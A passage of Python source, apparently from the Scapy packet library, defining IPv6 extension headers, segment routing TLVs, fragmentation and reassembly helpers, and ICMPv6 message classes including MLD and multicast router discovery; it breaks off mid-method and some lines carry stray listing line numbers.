class IPv6ExtHdrDestOpt(_IPv6ExtHdr):
    """Destination Options extension header

    'len' is the size of the header in 8-byte units, first unit excluded.
    At build time it is derived from the length of 'options' plus the two
    bytes of 'nh' and 'len'.
    """
    name = "IPv6 Extension Header - Destination Options Header"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        FieldLenField("len", None, length_of="options", fmt="B",
                      adjust=lambda pkt, x: (x + 9) // 8 - 1),
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        _OptionsField("options", [], HBHOptUnknown, 2,
                      length_from=lambda pkt: 8 * (pkt.len + 1) - 2),
    ]
    overload_fields = {IPv6: {"nh": 60}}
945
946
947# Routing Header #
948
class IPv6ExtHdrRouting(_IPv6ExtHdr):
    """Routing extension header followed by a list of IPv6 addresses

    'len' is built as twice the number of addresses, and 'segleft' as
    the number of addresses when left to None.
    """
    name = "IPv6 Option Header Routing"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # in 8 bytes blocks: two per address
        FieldLenField("len", None, count_of="addresses", fmt="B",
                      adjust=lambda pkt, x: 2 * x),
        ByteField("type", 0),
        ByteField("segleft", None),
        # There is meaning in this field ...
        BitField("reserved", 0, 32),
        IP6ListField("addresses", [],
                     length_from=lambda pkt: 8 * pkt.len),
    ]
    overload_fields = {IPv6: {"nh": 43}}

    def post_build(self, pkt, pay):
        if self.segleft is None:
            # 'segleft' is the fourth byte of the header
            segleft = struct.pack("B", len(self.addresses))
            pkt = pkt[:3] + segleft + pkt[4:]
        return _IPv6ExtHdr.post_build(self, pkt, pay)
965
966
967# Segment Routing Header #
968
969# This implementation is based on RFC8754, but some older snippets come from:
970# https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06
971
972_segment_routing_header_tlvs = {
973 # RFC 8754 sect 8.2
974 0: "Pad1 TLV",
975 1: "Ingress Node TLV", # draft 06
976 2: "Egress Node TLV", # draft 06
977 4: "PadN TLV",
978 5: "HMAC TLV",
979}
980
981
class IPv6ExtHdrSegmentRoutingTLV(Packet):
    """Generic Segment Routing TLV, and dispatcher to its variants

    Variants are recorded in 'registered_sr_tlv', indexed by the default
    value of their 'type' field.
    """
    name = "IPv6 Option Header Segment Routing - Generic TLV"
    # RFC 8754 sect 2.1
    fields_desc = [
        ByteEnumField("type", None, _segment_routing_header_tlvs),
        ByteField("len", 0),
        StrLenField("value", "", length_from=lambda pkt: pkt.len),
    ]

    def extract_padding(self, p):
        # What follows belongs to the next TLV
        return b"", p

    registered_sr_tlv = {}

    @classmethod
    def register_variant(cls):
        cls.registered_sr_tlv[cls.type.default] = cls

    @classmethod
    def dispatch_hook(cls, pkt=None, *args, **kargs):
        # Without bytes to look at, stay on the current class
        if not pkt:
            return cls
        # The TLV type is the first byte
        return cls.registered_sr_tlv.get(ord(pkt[:1]), cls)
1004
1005
class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV):
    """Ingress Node TLV (type 1), carrying one IPv6 address"""
    name = "IPv6 Option Header Segment Routing - Ingress Node TLV"
    # draft-ietf-6man-segment-routing-header-06 3.1.1
    fields_desc = [
        ByteEnumField("type", 1, _segment_routing_header_tlvs),
        ByteField("len", 18),
        ByteField("reserved", 0),
        ByteField("flags", 0),
        IP6Field("ingress_node", "::1"),
    ]
1014
1015
class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV):
    """Egress Node TLV (type 2), carrying one IPv6 address"""
    name = "IPv6 Option Header Segment Routing - Egress Node TLV"
    # draft-ietf-6man-segment-routing-header-06 3.1.2
    fields_desc = [
        ByteEnumField("type", 2, _segment_routing_header_tlvs),
        ByteField("len", 18),
        ByteField("reserved", 0),
        ByteField("flags", 0),
        IP6Field("egress_node", "::1"),
    ]
1024
1025
class IPv6ExtHdrSegmentRoutingTLVPad1(IPv6ExtHdrSegmentRoutingTLV):
    """Pad1 TLV (type 0), built here with a length byte and padding"""
    name = "IPv6 Option Header Segment Routing - Pad1 TLV"
    # RFC8754 sect 2.1.1.1
    fields_desc = [
        ByteEnumField("type", 0, _segment_routing_header_tlvs),
        FieldLenField("len", None, length_of="padding", fmt="B"),
        StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len),
    ]
1032
1033
class IPv6ExtHdrSegmentRoutingTLVPadN(IPv6ExtHdrSegmentRoutingTLV):
    """Segment Routing Header padding TLV of type 4.

    Made of a type byte, a one-byte "len" derived from the padding, and the
    padding bytes themselves (one zero byte by default).
    """
    name = "IPv6 Option Header Segment Routing - PadN TLV"
    # RFC8754 sect 2.1.1.2
    fields_desc = [ByteEnumField("type", 4, _segment_routing_header_tlvs),
                   FieldLenField("len", None, length_of="padding", fmt="B"),
                   StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)]  # noqa: E501
1040
1041
class IPv6ExtHdrSegmentRoutingTLVHMAC(IPv6ExtHdrSegmentRoutingTLV):
    """Segment Routing Header TLV of type 5 carrying an HMAC.

    When "len" is left to None it is derived from the "hmac" field with 48
    added; on dissection "hmac" spans ``len - 48`` bytes.
    """
    # NOTE(review): the 48 offset and the default format of the "len" field
    # should be checked against RFC 8754 sect 2.1.2.
    name = "IPv6 Option Header Segment Routing - HMAC TLV"
    # RFC8754 sect 2.1.2
    fields_desc = [ByteEnumField("type", 5, _segment_routing_header_tlvs),
                   FieldLenField("len", None, length_of="hmac",
                                 adjust=lambda _, x: x + 48),
                   BitField("D", 0, 1),
                   BitField("reserved", 0, 15),
                   IntField("hmackeyid", 0),
                   StrLenField("hmac", "",
                               length_from=lambda pkt: pkt.len - 48)]
1053
1054
class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr):
    """IPv6 Segment Routing Header (routing header type 4).

    Holds the list of segment addresses followed by optional TLVs. The
    "len", "segleft" and "lastentry" fields are computed in ``post_build``
    when they are left to None.
    """
    name = "IPv6 Option Header Segment Routing"
    # RFC8754 sect 2. + flag bits from draft 06
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   ByteField("len", None),
                   ByteField("type", 4),
                   ByteField("segleft", None),
                   ByteField("lastentry", None),
                   BitField("unused1", 0, 1),
                   BitField("protected", 0, 1),
                   BitField("oam", 0, 1),
                   BitField("alert", 0, 1),
                   BitField("hmac", 0, 1),
                   BitField("unused2", 0, 3),
                   ShortField("tag", 0),
                   IP6ListField("addresses", ["::1"],
                                count_from=lambda pkt: (pkt.lastentry + 1)),
                   # TLVs use what is left of the header once the fixed part
                   # (not counted by "len") and the addresses are removed
                   PacketListField("tlv_objects", [],
                                   IPv6ExtHdrSegmentRoutingTLV,
                                   length_from=lambda pkt: 8 * pkt.len - 16 * (
                                       pkt.lastentry + 1
                                   ))]

    overload_fields = {IPv6: {"nh": 43}}

    def post_build(self, pkt, pay):
        """Pad the header and fill in the fields left to None.

        :param pkt: the built header, as bytes
        :param pay: the built payload, as bytes
        :return: whatever ``_IPv6ExtHdr.post_build`` returns for the
            completed header and the payload
        """

        if self.len is None:

            # The extension must be aligned on 8 bytes
            missing = -len(pkt) % 8
            if missing == 1:
                # RFC 8754 sect 2.1.1.1: Pad1 is a lone Type octet (value 0)
                # without length nor value. Building
                # IPv6ExtHdrSegmentRoutingTLVPad1() would add three bytes
                # (type, len, padding) and break the alignment again.
                pkt += b"\x00"
            elif missing >= 2:
                # PadN: 2 bytes of type/len followed by the filler
                filler = b"\x00" * (missing - 2)
                pkt += raw(IPv6ExtHdrSegmentRoutingTLVPadN(padding=filler))

            # Length in 8-octet units, not counting the first 8 octets
            hdr_len = (len(pkt) - 8) // 8
            pkt = pkt[:1] + struct.pack("B", hdr_len) + pkt[2:]

        if self.segleft is None:
            # Index of the last address, or 0 when the list is empty
            segleft = len(self.addresses)
            if segleft:
                segleft -= 1
            pkt = pkt[:3] + struct.pack("B", segleft) + pkt[4:]

        if self.lastentry is None:
            lastentry = len(self.addresses)
            if lastentry == 0:
                warning(
                    "IPv6ExtHdrSegmentRouting(): the addresses list is empty!"
                )
            else:
                lastentry -= 1
            pkt = pkt[:4] + struct.pack("B", lastentry) + pkt[5:]

        return _IPv6ExtHdr.post_build(self, pkt, pay)
1115
1116
1117# Fragmentation Header #
1118
class IPv6ExtHdrFragment(_IPv6ExtHdr):
    """IPv6 Fragment extension header.

    "offset" is a 13-bit field, "m" a 1-bit flag and "id" a 32-bit
    identification value.
    """
    name = "IPv6 Extension Header - Fragmentation header"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        BitField("res1", 0, 8),
        BitField("offset", 0, 13),
        BitField("res2", 0, 2),
        BitField("m", 0, 1),
        IntField("id", None),
    ]
    overload_fields = {IPv6: {"nh": 44}}

    def guess_payload_class(self, p):
        """Return Raw for non-initial fragments, else defer to the parent.

        A fragment with a non-zero offset does not start with an upper
        layer header, so its content is kept as raw bytes.
        """
        if self.offset <= 0:
            return super(IPv6ExtHdrFragment, self).guess_payload_class(p)
        return Raw
1134
1135
def defragment6(packets):
    """
    Performs defragmentation of a list of IPv6 packets.

    Packets without a Fragment header are ignored, as well as fragments whose
    identification differs from the one of the first fragment found (a
    warning is issued in that case). The remaining fragments are reordered
    by offset. Missing data is replaced by 'X' characters.

    :param packets: list of packets, fragments included
    :return: an empty list when no fragment is found, the reassembled packet
        otherwise
    """

    # Remove non fragments
    frags = [x for x in packets if IPv6ExtHdrFragment in x]
    if not frags:
        return []

    # Only keep the fragments that belong to the first fragment's datagram
    frag_id = frags[0][IPv6ExtHdrFragment].id
    same_id = [x for x in frags if x[IPv6ExtHdrFragment].id == frag_id]
    if len(same_id) != len(frags):
        warning("defragment6: some fragmented packets have been removed from list")  # noqa: E501

    # Reorder fragments by increasing offset. sorted() is stable, so
    # fragments sharing an offset keep their arrival order.
    res = sorted(same_id, key=lambda x: x[IPv6ExtHdrFragment].offset)

    # regenerate the fragmentable part
    fragmentable = b""
    for p in res:
        q = p[IPv6ExtHdrFragment]
        offset = 8 * q.offset  # the offset field counts 8-octet units
        if offset != len(fragmentable):
            warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset))  # noqa: E501
        # A negative count yields b"": nothing is added on overlap
        fragmentable += b"X" * (offset - len(fragmentable))
        fragmentable += raw(q.payload)

    # Regenerate the unfragmentable part.
    q = res[0].copy()
    nh = q[IPv6ExtHdrFragment].nh
    # The layer below the Fragment header takes over its next header value
    q[IPv6ExtHdrFragment].underlayer.nh = nh
    q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable)
    del q[IPv6ExtHdrFragment].underlayer.payload
    q /= conf.raw_layer(load=fragmentable)
    del q.plen

    # Build and dissect again so that the payload is parsed into layers
    if q[IPv6].underlayer:
        q[IPv6] = IPv6(raw(q[IPv6]))
    else:
        q = IPv6(raw(q))
    return q
1191
1192
def fragment6(pkt, fragSize):
    """
    Performs fragmentation of an IPv6 packet. 'fragSize' argument is the
    expected maximum size of fragment data (MTU). The list of packets is
    returned.

    If packet does not contain an IPv6ExtHdrFragment class, it is added to
    first IPv6 layer found. If no IPv6 layer exists packet is returned in
    result list unmodified.

    :param pkt: the packet to fragment; a copy is used, pkt is not modified
    :param fragSize: maximum size of each produced packet
    :return: a list of packets. It is empty when the part following the
        IPv6 header exceeds 65535 bytes, and holds a single packet when no
        fragmentation is needed or when fragSize is too low.
    """

    pkt = pkt.copy()

    if IPv6ExtHdrFragment not in pkt:
        if IPv6 not in pkt:
            return [pkt]

        # Insert a Fragment header between IPv6 and its payload
        layer3 = pkt[IPv6]
        data = layer3.payload
        frag = IPv6ExtHdrFragment(nh=layer3.nh)

        layer3.remove_payload()
        del layer3.nh
        del layer3.plen

        frag.add_payload(data)
        layer3.add_payload(frag)

    # If the payload is bigger than 65535, a Jumbo payload must be used, as
    # an IPv6 packet can't be bigger than 65535 bytes.
    if len(raw(pkt[IPv6ExtHdrFragment])) > 65535:
        warning("An IPv6 packet can't be bigger than 65535, please use a Jumbo payload.")  # noqa: E501
        return []

    s = raw(pkt)  # for instantiation to get upper layer checksum right

    if len(s) <= fragSize:
        return [pkt]

    # Fragmentable part : fake IPv6 for Fragmentable part length computation
    fragPart = pkt[IPv6ExtHdrFragment].payload
    tmp = raw(IPv6(src="::1", dst="::1") / fragPart)
    fragPartLen = len(tmp) - 40  # basic IPv6 header length
    fragPartStr = s[-fragPartLen:]

    # Grab Next Header for use in Fragment Header
    nh = pkt[IPv6ExtHdrFragment].nh

    # Keep fragment header
    fragHeader = pkt[IPv6ExtHdrFragment]
    del fragHeader.payload  # detach payload

    # Unfragmentable Part (8 is the size of the Fragment header)
    unfragPartLen = len(s) - fragPartLen - 8
    unfragPart = pkt
    del pkt[IPv6ExtHdrFragment].underlayer.payload  # detach payload

    # Cut the fragmentable part to fit fragSize. Inner fragments have
    # a length that is an integer multiple of 8 octets. last Frag MTU
    # can be anything below MTU
    lastFragSize = fragSize - unfragPartLen - 8
    innerFragSize = lastFragSize - (lastFragSize % 8)

    if lastFragSize <= 0 or innerFragSize == 0:
        warning("Provided fragment size value is too low. " +
                "Should be more than %d" % (unfragPartLen + 8))
        return [unfragPart / fragHeader / fragPart]

    remain = fragPartStr
    res = []
    fragOffset = 0  # offset, incremented during creation
    fragId = random.randint(0, 0xffffffff)  # random id ...
    if fragHeader.id is not None:  # ... except id provided by user
        fragId = fragHeader.id
    fragHeader.m = 1
    fragHeader.id = fragId
    fragHeader.nh = nh

    # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ...
    while True:
        if (len(remain) > lastFragSize):
            tmp = remain[:innerFragSize]
            remain = remain[innerFragSize:]
            fragHeader.offset = fragOffset    # update offset
            fragOffset += (innerFragSize // 8)  # compute new one
            if IPv6 in unfragPart:
                # Let the payload length be computed for each fragment
                unfragPart[IPv6].plen = None
            tempo = unfragPart / fragHeader / conf.raw_layer(load=tmp)
            res.append(tempo)
        else:
            # Last fragment: what remains fits, clear the M flag
            fragHeader.offset = fragOffset    # update offSet
            fragHeader.m = 0
            if IPv6 in unfragPart:
                unfragPart[IPv6].plen = None
            tempo = unfragPart / fragHeader / conf.raw_layer(load=remain)
            res.append(tempo)
            break
    return res
1291
1292
1293#############################################################################
1294#############################################################################
1295# ICMPv6* Classes #
1296#############################################################################
1297#############################################################################
1298
1299
# ICMPv6 type value -> name of the class that implements the message.
# Values are class names given as strings; types marked "Do Me" have no
# class yet.
icmp6typescls = {1: "ICMPv6DestUnreach",
                 2: "ICMPv6PacketTooBig",
                 3: "ICMPv6TimeExceeded",
                 4: "ICMPv6ParamProblem",
                 128: "ICMPv6EchoRequest",
                 129: "ICMPv6EchoReply",
                 130: "ICMPv6MLQuery",  # MLDv1 or MLDv2
                 131: "ICMPv6MLReport",
                 132: "ICMPv6MLDone",
                 133: "ICMPv6ND_RS",
                 134: "ICMPv6ND_RA",
                 135: "ICMPv6ND_NS",
                 136: "ICMPv6ND_NA",
                 137: "ICMPv6ND_Redirect",
                 # 138: Do Me - RFC 2894 - Seems painful
                 139: "ICMPv6NIQuery",
                 140: "ICMPv6NIReply",
                 141: "ICMPv6ND_INDSol",
                 142: "ICMPv6ND_INDAdv",
                 143: "ICMPv6MLReport2",
                 144: "ICMPv6HAADRequest",
                 145: "ICMPv6HAADReply",
                 146: "ICMPv6MPSol",
                 147: "ICMPv6MPAdv",
                 # 148: Do Me - SEND related - RFC 3971
                 # 149: Do Me - SEND related - RFC 3971
                 151: "ICMPv6MRD_Advertisement",
                 152: "ICMPv6MRD_Solicitation",
                 153: "ICMPv6MRD_Termination",
                 # 154: Do Me - FMIPv6 Messages - RFC 5568
                 155: "ICMPv6RPL",  # RFC 6550
                 }
1332
# ICMPv6 type value -> minimal header length of the message.
# NOTE(review): presumably expressed in bytes - confirm against the users of
# this table. Types 139 and 140 have no entry.
icmp6typesminhdrlen = {1: 8,
                       2: 8,
                       3: 8,
                       4: 8,
                       128: 8,
                       129: 8,
                       130: 24,
                       131: 24,
                       132: 24,
                       133: 8,
                       134: 16,
                       135: 24,
                       136: 24,
                       137: 40,
                       # 139:
                       # 140
                       141: 8,
                       142: 8,
                       143: 8,
                       144: 8,
                       145: 8,
                       146: 8,
                       147: 8,
                       151: 8,
                       152: 4,
                       153: 4,
                       155: 4
                       }
1361
# ICMPv6 type value -> display name. Used as the enum table of the "type"
# field of the ICMPv6 message classes.
icmp6types = {1: "Destination unreachable",
              2: "Packet too big",
              3: "Time exceeded",
              4: "Parameter problem",
              100: "Private Experimentation",
              101: "Private Experimentation",
              128: "Echo Request",
              129: "Echo Reply",
              130: "MLD Query",
              131: "MLD Report",
              132: "MLD Done",
              133: "Router Solicitation",
              134: "Router Advertisement",
              135: "Neighbor Solicitation",
              136: "Neighbor Advertisement",
              137: "Redirect Message",
              138: "Router Renumbering",
              139: "ICMP Node Information Query",
              140: "ICMP Node Information Response",
              141: "Inverse Neighbor Discovery Solicitation Message",
              142: "Inverse Neighbor Discovery Advertisement Message",
              143: "MLD Report Version 2",
              144: "Home Agent Address Discovery Request Message",
              145: "Home Agent Address Discovery Reply Message",
              146: "Mobile Prefix Solicitation",
              147: "Mobile Prefix Advertisement",
              148: "Certification Path Solicitation",
              149: "Certification Path Advertisement",
              151: "Multicast Router Advertisement",
              152: "Multicast Router Solicitation",
              153: "Multicast Router Termination",
              155: "RPL Control Message",
              200: "Private Experimentation",
              201: "Private Experimentation"}
1396
1397
class _ICMPv6(Packet):
    """Common base of the ICMPv6 messages.

    Subclasses are expected to declare "type", "code" and "cksum" fields,
    the checksum being stored in bytes 2 and 3 of the message.
    """
    name = "ICMPv6 dummy class"
    overload_fields = {IPv6: {"nh": 58}}

    def post_build(self, p, pay):
        """Append the payload and compute the checksum if it is unset."""
        message = p + pay
        if self.cksum is not None:
            return message
        # 58 is the next header value of ICMPv6
        computed = in6_chksum(58, self.underlayer, message)
        return message[:2] + struct.pack("!H", computed) + message[4:]

    def hashret(self):
        """Delegate the hash to the payload."""
        return self.payload.hashret()

    def answers(self, other):
        """Return 1 when self matches ``other`` on type and code, else 0.

        The comparison only takes place when the underlayer is an IPerror6,
        or when it is an extension header and ``other`` is an ICMPv6 message.
        """
        # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
        lower = self.underlayer
        within_error = isinstance(lower, IPerror6)
        # "and" binds tighter than "or": the type of other is only checked
        # on the extension header side
        behind_exthdr = (isinstance(lower, _IPv6ExtHdr) and
                         isinstance(other, _ICMPv6))
        if not (within_error or behind_exthdr):
            return 0
        if self.type == other.type and self.code == other.code:
            return 1
        return 0
1422
1423
class _ICMPv6Error(_ICMPv6):
    """Common base of the ICMPv6 error messages."""
    name = "ICMPv6 errors dummy class"

    def guess_payload_class(self, p):
        """Always dissect the payload as IPerror6, whatever its content."""
        return IPerror6
1429
1430
class ICMPv6Unknown(_ICMPv6):
    """Fallback ICMPv6 message: common header plus an opaque body."""
    name = "Scapy6 ICMPv6 fallback class"
    fields_desc = [ByteEnumField("type", 1, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   # Everything after the checksum, kept as raw bytes
                   StrField("msgbody", "")]
1437
1438
1439# RFC 2460 #
1440
class ICMPv6DestUnreach(_ICMPv6Error):
    """ICMPv6 Destination Unreachable error (type 1).

    Ends with the ICMP extension padding and extension fields imported from
    scapy.layers.inet.
    """
    name = "ICMPv6 Destination Unreachable"
    fields_desc = [ByteEnumField("type", 1, icmp6types),
                   ByteEnumField("code", 0, {0: "No route to destination",
                                             1: "Communication with destination administratively prohibited",  # noqa: E501
                                             2: "Beyond scope of source address",  # noqa: E501
                                             3: "Address unreachable",
                                             4: "Port unreachable"}),
                   XShortField("cksum", None),
                   ByteField("length", 0),
                   X3BytesField("unused", 0),
                   _ICMPExtensionPadField(),
                   _ICMPExtensionField()]
    # Shared with the ICMP (v4) classes of scapy.layers.inet
    post_dissection = _ICMP_extpad_post_dissection
1455
1456
class ICMPv6PacketTooBig(_ICMPv6Error):
    """ICMPv6 Packet Too Big error (type 2); "mtu" defaults to 1280."""
    name = "ICMPv6 Packet Too Big"
    fields_desc = [ByteEnumField("type", 2, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   IntField("mtu", 1280)]
1463
1464
class ICMPv6TimeExceeded(_ICMPv6Error):
    """ICMPv6 Time Exceeded error (type 3).

    Ends with the ICMP extension padding and extension fields imported from
    scapy.layers.inet.
    """
    name = "ICMPv6 Time Exceeded"
    fields_desc = [ByteEnumField("type", 3, icmp6types),
                   ByteEnumField("code", 0, {0: "hop limit exceeded in transit",  # noqa: E501
                                             1: "fragment reassembly time exceeded"}),  # noqa: E501
                   XShortField("cksum", None),
                   ByteField("length", 0),
                   X3BytesField("unused", 0),
                   _ICMPExtensionPadField(),
                   _ICMPExtensionField()]
    # Shared with the ICMP (v4) classes of scapy.layers.inet
    post_dissection = _ICMP_extpad_post_dissection
1476
1477
1478# The default pointer value is set to the next header field of
1479# the encapsulated IPv6 packet
1480
1481
class ICMPv6ParamProblem(_ICMPv6Error):
    """ICMPv6 Parameter Problem error (type 4).

    "ptr" defaults to 6, the offset of the next header field in an IPv6
    header.
    """
    name = "ICMPv6 Parameter Problem"
    fields_desc = [ByteEnumField("type", 4, icmp6types),
                   ByteEnumField(
                       "code", 0,
                       {0: "erroneous header field encountered",
                        1: "unrecognized Next Header type encountered",
                        2: "unrecognized IPv6 option encountered",
                        3: "first fragment has incomplete header chain"}),
                   XShortField("cksum", None),
                   IntField("ptr", 6)]
1493
1494
class ICMPv6EchoRequest(_ICMPv6):
    """ICMPv6 Echo Request (type 128): identifier, sequence number, data."""
    name = "ICMPv6 Echo Request"
    fields_desc = [
        ByteEnumField("type", 128, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XShortField("id", 0),
        XShortField("seq", 0),
        StrField("data", ""),
    ]

    def mysummary(self):
        """Return a one-line summary showing the id and seq values."""
        return self.sprintf("%name% (id: %id% seq: %seq%)")

    def hashret(self):
        """Return the packed id and seq followed by the payload hash."""
        id_and_seq = struct.pack("HH", self.id, self.seq)
        return id_and_seq + self.payload.hashret()
1509
1510
class ICMPv6EchoReply(ICMPv6EchoRequest):
    """ICMPv6 Echo Reply (type 129), same layout as the Echo Request."""
    name = "ICMPv6 Echo Reply"
    type = 129

    def answers(self, other):
        """Tell whether this reply matches the Echo Request ``other``.

        The identifier, the sequence number and the data must be equal.
        """
        if not isinstance(other, ICMPv6EchoRequest):
            return False
        same_exchange = self.id == other.id and self.seq == other.seq
        return same_exchange and self.data == other.data
1520
1521
1522# ICMPv6 Multicast Listener Discovery (RFC2710) #
1523
# All MLD messages are sent with a link-local source address
# -> take care of it in post_build if none is specified
# The Hop-Limit value must be 1
1527# "and an IPv6 Router Alert option in a Hop-by-Hop Options
1528# header. (The router alert option is necessary to cause routers to
1529# examine MLD messages sent to multicast addresses in which the router
1530# itself has no interest"
class _ICMPv6ML(_ICMPv6):
    """Common layout of the MLD Query, Report and Done messages."""
    fields_desc = [ByteEnumField("type", 130, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   ShortField("mrd", 0),
                   ShortField("reserved", 0),
                   IP6Field("mladdr", "::")]
1538
1539# general queries are sent to the link-scope all-nodes multicast
1540# address ff02::1, with a multicast address field of 0 and a MRD of
1541# [Query Response Interval]
1542# Default value for mladdr is set to 0 for a General Query, and
1543# overloaded by the user for a Multicast Address specific query
1544# TODO : See what we can do to automatically include a Router Alert
1545# Option in a Destination Option Header.
1546
1547
class ICMPv6MLQuery(_ICMPv6ML):  # RFC 2710
    """MLD Query (type 130).

    Defaults describe a General Query: unspecified multicast address, and
    an IPv6 underlayer sent to ff02::1 with a hop limit of 1.
    """
    name = "MLD - Multicast Listener Query"
    type = 130
    mrd = 10000  # 10s for mrd
    mladdr = "::"
    overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}
1554
1555
1556# TODO : See what we can do to automatically include a Router Alert
1557# Option in a Destination Option Header.
class ICMPv6MLReport(_ICMPv6ML):  # RFC 2710
    """MLD Report (type 131); the IPv6 underlayer gets a hop limit of 1."""
    name = "MLD - Multicast Listener Report"
    type = 131
    overload_fields = {IPv6: {"hlim": 1, "nh": 58}}

    def answers(self, query):
        """Check the query type"""
        # Any packet containing an ICMPv6MLQuery layer is accepted
        return ICMPv6MLQuery in query
1566
1567# When a node ceases to listen to a multicast address on an interface,
1568# it SHOULD send a single Done message to the link-scope all-routers
1569# multicast address (FF02::2), carrying in its multicast address field
1570# the address to which it is ceasing to listen
1571# TODO : See what we can do to automatically include a Router Alert
1572# Option in a Destination Option Header.
1573
1574
class ICMPv6MLDone(_ICMPv6ML):  # RFC 2710
    """MLD Done (type 132); the IPv6 underlayer defaults to ff02::2."""
    name = "MLD - Multicast Listener Done"
    type = 132
    overload_fields = {IPv6: {"dst": "ff02::2", "hlim": 1, "nh": 58}}
1579
1580
1581# Multicast Listener Discovery Version 2 (MLDv2) (RFC3810) #
1582
class ICMPv6MLQuery2(_ICMPv6):  # RFC 3810
    """MLDv2 Query (type 130) with its list of source addresses.

    "sources_number" is derived from "sources" at build time when it is
    left to None.
    """
    name = "MLDv2 - Multicast Listener Query"
    fields_desc = [
        ByteEnumField("type", 130, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        ShortField("mrd", 10000),
        ShortField("reserved", 0),
        IP6Field("mladdr", "::"),
        BitField("Resv", 0, 4),
        BitField("S", 0, 1),
        BitField("QRV", 0, 3),
        ByteField("QQIC", 0),
        ShortField("sources_number", None),
        IP6ListField("sources", [],
                     count_from=lambda query: query.sources_number),
    ]

    # RFC 3810 - 4. Message Formats
    overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}

    def post_build(self, packet, payload):
        """Compute the 'sources_number' field when needed"""
        if self.sources_number is None:
            # The counter is stored in bytes 26 and 27 of the message
            before, after = packet[:26], packet[28:]
            packet = before + struct.pack("!H", len(self.sources)) + after
        return _ICMPv6.post_build(self, packet, payload)
1608
1609
class ICMPv6MLDMultAddrRec(Packet):
    """MLDv2 Multicast Address Record, as listed in an MLDv2 Report.

    Both length fields are derived from the fields they describe when left
    to None.
    """
    name = "ICMPv6 MLDv2 - Multicast Address Record"
    fields_desc = [ByteField("rtype", 4),
                   FieldLenField("auxdata_len", None,
                                 length_of="auxdata",
                                 fmt="B"),
                   # Number of addresses: byte length of "sources" over 16
                   FieldLenField("sources_number", None,
                                 length_of="sources",
                                 adjust=lambda p, num: num // 16),
                   IP6Field("dst", "::"),
                   IP6ListField("sources", [],
                                length_from=lambda p: 16 * p.sources_number),
                   StrLenField("auxdata", "",
                               length_from=lambda p: p.auxdata_len)]

    def default_payload_class(self, packet):
        """Multicast Address Record followed by another one"""
        return self.__class__
1628
1629
class ICMPv6MLReport2(_ICMPv6):  # RFC 3810
    """MLDv2 Report (type 143) holding Multicast Address Records.

    "records_number" is derived from "records" at build time when it is
    left to None.
    """
    name = "MLDv2 - Multicast Listener Report"
    fields_desc = [
        ByteEnumField("type", 143, icmp6types),
        ByteField("res", 0),
        XShortField("cksum", None),
        ShortField("reserved", 0),
        ShortField("records_number", None),
        PacketListField("records", [],
                        ICMPv6MLDMultAddrRec,
                        count_from=lambda report: report.records_number),
    ]

    # RFC 3810 - 4. Message Formats
    overload_fields = {IPv6: {"dst": "ff02::16", "hlim": 1, "nh": 58}}

    def post_build(self, packet, payload):
        """Compute the 'records_number' field when needed"""
        if self.records_number is None:
            # The counter is stored in bytes 6 and 7 of the message
            before, after = packet[:6], packet[8:]
            packet = before + struct.pack("!H", len(self.records)) + after
        return _ICMPv6.post_build(self, packet, payload)

    def answers(self, query):
        """Check the query type"""
        return isinstance(query, ICMPv6MLQuery2)
1654
1655
1656# ICMPv6 MRD - Multicast Router Discovery (RFC 4286) #
1657
1658# TODO:
1659# - 04/09/06 troglocan : find a way to automatically add a router alert
1660# option for all MRD packets. This could be done in a specific
1661# way when IPv6 is the under layer with some specific keyword
1662# like 'exthdr'. This would allow to keep compatibility with
1663# providing IPv6 fields to be overloaded in fields_desc.
1664#
1665# At the moment, if user inserts an IPv6 Router alert option
1666# none of the IPv6 default values of IPv6 layer will be set.
1667
class ICMPv6MRD_Advertisement(_ICMPv6):
    """Multicast Router Discovery Advertisement (type 151).

    The byte usually holding the ICMPv6 code carries "advinter" here.
    """
    name = "ICMPv6 Multicast Router Discovery Advertisement"
    fields_desc = [ByteEnumField("type", 151, icmp6types),
                   ByteField("advinter", 20),
                   XShortField("cksum", None),
                   ShortField("queryint", 0),
                   ShortField("robustness", 0)]
    overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}
    # IPv6 Router Alert requires manual inclusion

    def extract_padding(self, s):
        """Keep the first 8 bytes of ``s`` as payload, the rest as padding."""
        return s[:8], s[8:]
1680
1681
class ICMPv6MRD_Solicitation(_ICMPv6):
    """Multicast Router Discovery Solicitation (type 152)."""
    name = "ICMPv6 Multicast Router Discovery Solicitation"
    fields_desc = [ByteEnumField("type", 152, icmp6types),
                   ByteField("res", 0),
                   XShortField("cksum", None)]
    overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}
    # IPv6 Router Alert requires manual inclusion

    def extract_padding(self, s):
        """Keep the first 4 bytes of ``s`` as payload, the rest as padding."""
        return s[:4], s[4:]
1692
1693
class ICMPv6MRD_Termination(_ICMPv6):
    """Multicast Router Discovery Termination (type 153)."""
    name = "ICMPv6 Multicast Router Discovery Termination"
    fields_desc = [ByteEnumField("type", 153, icmp6types),
                   ByteField("res", 0),
                   XShortField("cksum", None)]
    overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::6A"}}
    # IPv6 Router Alert requires manual inclusion

    def extract_padding(self, s):
